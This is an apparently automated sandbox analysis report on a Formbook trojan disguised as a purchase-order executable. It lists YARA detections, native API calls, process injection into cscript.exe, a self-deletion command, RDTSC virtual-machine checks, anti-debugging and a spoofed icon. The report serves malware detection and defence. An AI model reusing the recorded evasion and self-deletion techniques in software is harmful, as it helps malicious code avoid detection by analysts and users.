          Source: 00000010.00000002.507780736.0000000003570000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.507780736.0000000003570000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: String function: 008B3B40 appears 42 times
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: String function: 012EB150 appears 35 times
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: String function: 008B42A1 appears 32 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0532B150 appears 66 times
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_004181D0 NtCreateFile,3_2_004181D0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_00418280 NtReadFile,3_2_00418280
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_00418300 NtClose,3_2_00418300
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_004183B0 NtAllocateVirtualMemory,3_2_004183B0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_004181CA NtCreateFile,3_2_004181CA
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0041827A NtReadFile,3_2_0041827A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_004182CA NtReadFile,3_2_004182CA
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_004182FA NtClose,3_2_004182FA
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_004183AB NtAllocateVirtualMemory,3_2_004183AB
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_01329910
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013299A0 NtCreateSection,LdrInitializeThunk,3_2_013299A0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329860 NtQuerySystemInformation,LdrInitializeThunk,3_2_01329860
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329840 NtDelayExecution,LdrInitializeThunk,3_2_01329840
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013298F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_013298F0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329A20 NtResumeThread,LdrInitializeThunk,3_2_01329A20
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_01329A00
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329A50 NtCreateFile,LdrInitializeThunk,3_2_01329A50
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329540 NtReadFile,LdrInitializeThunk,3_2_01329540
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013295D0 NtClose,LdrInitializeThunk,3_2_013295D0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329710 NtQueryInformationToken,LdrInitializeThunk,3_2_01329710
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013297A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_013297A0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329780 NtMapViewOfSection,LdrInitializeThunk,3_2_01329780
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329FE0 NtCreateMutant,LdrInitializeThunk,3_2_01329FE0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_01329660
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013296E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_013296E0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329950 NtQueueApcThread,3_2_01329950
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013299D0 NtCreateProcessEx,3_2_013299D0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329820 NtEnumerateKey,3_2_01329820
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0132B040 NtSuspendThread,3_2_0132B040
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013298A0 NtWriteVirtualMemory,3_2_013298A0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329B00 NtSetValueKey,3_2_01329B00
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0132A3B0 NtGetContextThread,3_2_0132A3B0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329A10 NtQuerySection,3_2_01329A10
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329A80 NtOpenDirectoryObject,3_2_01329A80
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0132AD30 NtSetContextThread,3_2_0132AD30
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329520 NtWaitForSingleObject,3_2_01329520
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329560 NtWriteFile,3_2_01329560
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013295F0 NtQueryInformationFile,3_2_013295F0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329730 NtQueryVirtualMemory,3_2_01329730
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0132A710 NtOpenProcessToken,3_2_0132A710
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0132A770 NtOpenThread,3_2_0132A770
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329770 NtSetInformationFile,3_2_01329770
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329760 NtOpenProcess,3_2_01329760
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329610 NtEnumerateValueKey,3_2_01329610
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329670 NtQueryInformationProcess,3_2_01329670
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01329650 NtQueryValueKey,3_2_01329650
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013296D0 NtCreateKey,3_2_013296D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369540 NtReadFile,LdrInitializeThunk,16_2_05369540
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053695D0 NtClose,LdrInitializeThunk,16_2_053695D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369710 NtQueryInformationToken,LdrInitializeThunk,16_2_05369710
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369780 NtMapViewOfSection,LdrInitializeThunk,16_2_05369780
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369FE0 NtCreateMutant,LdrInitializeThunk,16_2_05369FE0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369660 NtAllocateVirtualMemory,LdrInitializeThunk,16_2_05369660
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369650 NtQueryValueKey,LdrInitializeThunk,16_2_05369650
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053696E0 NtFreeVirtualMemory,LdrInitializeThunk,16_2_053696E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053696D0 NtCreateKey,LdrInitializeThunk,16_2_053696D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369910 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_05369910
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053699A0 NtCreateSection,LdrInitializeThunk,16_2_053699A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369860 NtQuerySystemInformation,LdrInitializeThunk,16_2_05369860
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369840 NtDelayExecution,LdrInitializeThunk,16_2_05369840
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369A50 NtCreateFile,LdrInitializeThunk,16_2_05369A50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0536AD30 NtSetContextThread,16_2_0536AD30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369520 NtWaitForSingleObject,16_2_05369520
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369560 NtWriteFile,16_2_05369560
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053695F0 NtQueryInformationFile,16_2_053695F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369730 NtQueryVirtualMemory,16_2_05369730
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0536A710 NtOpenProcessToken,16_2_0536A710
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0536A770 NtOpenThread,16_2_0536A770
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369770 NtSetInformationFile,16_2_05369770
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369760 NtOpenProcess,16_2_05369760
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053697A0 NtUnmapViewOfSection,16_2_053697A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369610 NtEnumerateValueKey,16_2_05369610
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369670 NtQueryInformationProcess,16_2_05369670
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369950 NtQueueApcThread,16_2_05369950
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053699D0 NtCreateProcessEx,16_2_053699D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369820 NtEnumerateKey,16_2_05369820
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0536B040 NtSuspendThread,16_2_0536B040
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053698A0 NtWriteVirtualMemory,16_2_053698A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053698F0 NtReadVirtualMemory,16_2_053698F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369B00 NtSetValueKey,16_2_05369B00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0536A3B0 NtGetContextThread,16_2_0536A3B0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369A20 NtResumeThread,16_2_05369A20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369A10 NtQuerySection,16_2_05369A10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369A00 NtProtectVirtualMemory,16_2_05369A00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05369A80 NtOpenDirectoryObject,16_2_05369A80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DD81D0 NtCreateFile,16_2_00DD81D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DD8280 NtReadFile,16_2_00DD8280
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DD83B0 NtAllocateVirtualMemory,16_2_00DD83B0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DD8300 NtClose,16_2_00DD8300
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DD81CA NtCreateFile,16_2_00DD81CA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DD82CA NtReadFile,16_2_00DD82CA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DD82FA NtClose,16_2_00DD82FA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DD827A NtReadFile,16_2_00DD827A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DD83AB NtAllocateVirtualMemory,16_2_00DD83AB
          Source: PO 56720012359.exe, 00000001.00000003.247597225.0000000002FFF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO 56720012359.exe
          Source: PO 56720012359.exe, 00000003.00000002.329509813.000000000156F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO 56720012359.exe
          Source: PO 56720012359.exe, 00000003.00000002.330426042.0000000003350000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs PO 56720012359.exe
          Source: PO 56720012359.exeVirustotal: Detection: 50%
          Source: PO 56720012359.exeReversingLabs: Detection: 40%
          Source: PO 56720012359.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO 56720012359.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\PO 56720012359.exe 'C:\Users\user\Desktop\PO 56720012359.exe'
          Source: C:\Users\user\Desktop\PO 56720012359.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO 56720012359.exeProcess created: C:\Users\user\Desktop\PO 56720012359.exe 'C:\Users\user\Desktop\PO 56720012359.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO 56720012359.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/0@8/5
          Source: C:\Users\user\Desktop\PO 56720012359.exe Code function: 1_2_008B1450 lstrlenW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,lstrlenW,StartServiceCtrlDispatcherW,GetLastError,GetProcessHeap,HeapFree,1_2_008B1450
          Source: C:\Users\user\Desktop\PO 56720012359.exe Code function: 3_2_008B1450 lstrlenW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,lstrlenW,StartServiceCtrlDispatcherW,GetLastError,GetProcessHeap,HeapFree,3_2_008B1450
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6340:120:WilError_01
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2940:120:WilError_01
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\cscript.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: PO 56720012359.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: PO 56720012359.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: PO 56720012359.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: PO 56720012359.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: PO 56720012359.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: PO 56720012359.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: PO 56720012359.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cscript.pdbUGP source: PO 56720012359.exe, 00000003.00000002.330426042.0000000003350000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO 56720012359.exe, 00000001.00000003.249848116.0000000002D80000.00000004.00000001.sdmp, PO 56720012359.exe, 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, cscript.exe, 00000010.00000003.329208174.0000000005160000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO 56720012359.exe, cscript.exe
          Source: Binary string: cscript.pdb source: PO 56720012359.exe, 00000003.00000002.330426042.0000000003350000.00000040.00020000.sdmp
          Source: PO 56720012359.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: PO 56720012359.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: PO 56720012359.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: PO 56720012359.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: PO 56720012359.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

          Hooking and other Techniques for Hiding and Protection:

          Icon mismatch, binary includes an icon from a different legit application in order to fool users
          Source: initial sample Icon embedded in binary file: icon matches a legit application icon: download (15).png
          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\cscript.exe Process created: /c del 'C:\Users\user\Desktop\PO 56720012359.exe'
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 1_2_008B2FCD RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_008B2FCD
          Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\PO 56720012359.exe RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO 56720012359.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 0000000000DC85F4 second address: 0000000000DC85FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 0000000000DC898E second address: 0000000000DC8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe TID: 6476 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\PO 56720012359.exe Code function: 3_2_004088C0 rdtsc 3_2_004088C0
          Source: C:\Users\user\Desktop\PO 56720012359.exe Process information queried: ProcessInformation
          Source: explorer.exe, 00000005.00000000.315506357.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.273233836.0000000003767000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
          Source: cscript.exe, 00000010.00000002.508575985.000000000365E000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000005.00000000.272485902.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000005.00000000.278989155.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000005.00000000.289003104.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000005.00000000.278989155.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: C:\Users\user\Desktop\PO 56720012359.exe Code function: 1_2_008B4E99 _memset,IsDebuggerPresent,1_2_008B4E99
          Source: C:\Users\user\Desktop\PO 56720012359.exe Code function: 1_2_008B5AC5 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_008B5AC5
          Source: C:\Users\user\Desktop\PO 56720012359.exe Code function: 1_2_008B10B0 ExpandEnvironmentStringsW,GetLastError,GetProcessHeap,HeapAlloc,ExpandEnvironmentStringsW,GetLastError,GetProcessHeap,HeapFree,1_2_008B10B0
          Source: C:\Users\user\Desktop\PO 56720012359.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cscript.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013AFDE2 mov eax, dword ptr fs:[00000030h]3_2_013AFDE2
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013AFDE2 mov eax, dword ptr fs:[00000030h]3_2_013AFDE2
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013AFDE2 mov eax, dword ptr fs:[00000030h]3_2_013AFDE2
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01366DC9 mov eax, dword ptr fs:[00000030h]3_2_01366DC9
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01366DC9 mov eax, dword ptr fs:[00000030h]3_2_01366DC9
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01366DC9 mov eax, dword ptr fs:[00000030h]3_2_01366DC9
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01366DC9 mov ecx, dword ptr fs:[00000030h]3_2_01366DC9
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01366DC9 mov eax, dword ptr fs:[00000030h]3_2_01366DC9
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01366DC9 mov eax, dword ptr fs:[00000030h]3_2_01366DC9
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131BC2C mov eax, dword ptr fs:[00000030h]3_2_0131BC2C
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B740D mov eax, dword ptr fs:[00000030h]3_2_013B740D
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B740D mov eax, dword ptr fs:[00000030h]3_2_013B740D
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B740D mov eax, dword ptr fs:[00000030h]3_2_013B740D
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01366C0A mov eax, dword ptr fs:[00000030h]3_2_01366C0A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01366C0A mov eax, dword ptr fs:[00000030h]3_2_01366C0A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01366C0A mov eax, dword ptr fs:[00000030h]3_2_01366C0A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01366C0A mov eax, dword ptr fs:[00000030h]3_2_01366C0A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0130746D mov eax, dword ptr fs:[00000030h]3_2_0130746D
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0137C450 mov eax, dword ptr fs:[00000030h]3_2_0137C450
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0137C450 mov eax, dword ptr fs:[00000030h]3_2_0137C450
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131A44B mov eax, dword ptr fs:[00000030h]3_2_0131A44B
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F849B mov eax, dword ptr fs:[00000030h]3_2_012F849B
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A14FB mov eax, dword ptr fs:[00000030h]3_2_013A14FB
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01366CF0 mov eax, dword ptr fs:[00000030h]3_2_01366CF0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01366CF0 mov eax, dword ptr fs:[00000030h]3_2_01366CF0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01366CF0 mov eax, dword ptr fs:[00000030h]3_2_01366CF0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B8CD6 mov eax, dword ptr fs:[00000030h]3_2_013B8CD6
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E4F2E mov eax, dword ptr fs:[00000030h]3_2_012E4F2E
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E4F2E mov eax, dword ptr fs:[00000030h]3_2_012E4F2E
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131E730 mov eax, dword ptr fs:[00000030h]3_2_0131E730
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0130F716 mov eax, dword ptr fs:[00000030h]3_2_0130F716
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0137FF10 mov eax, dword ptr fs:[00000030h]3_2_0137FF10
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0137FF10 mov eax, dword ptr fs:[00000030h]3_2_0137FF10
